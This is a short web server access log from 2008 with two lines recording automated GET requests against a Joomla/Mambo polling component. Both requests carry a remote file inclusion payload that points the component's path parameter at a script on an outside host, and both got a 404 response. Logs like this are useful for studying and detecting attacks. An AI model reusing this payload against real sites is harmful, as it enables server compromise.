72.29.68.220 - - [31/Aug/2008:10:47:33 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:47:33 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
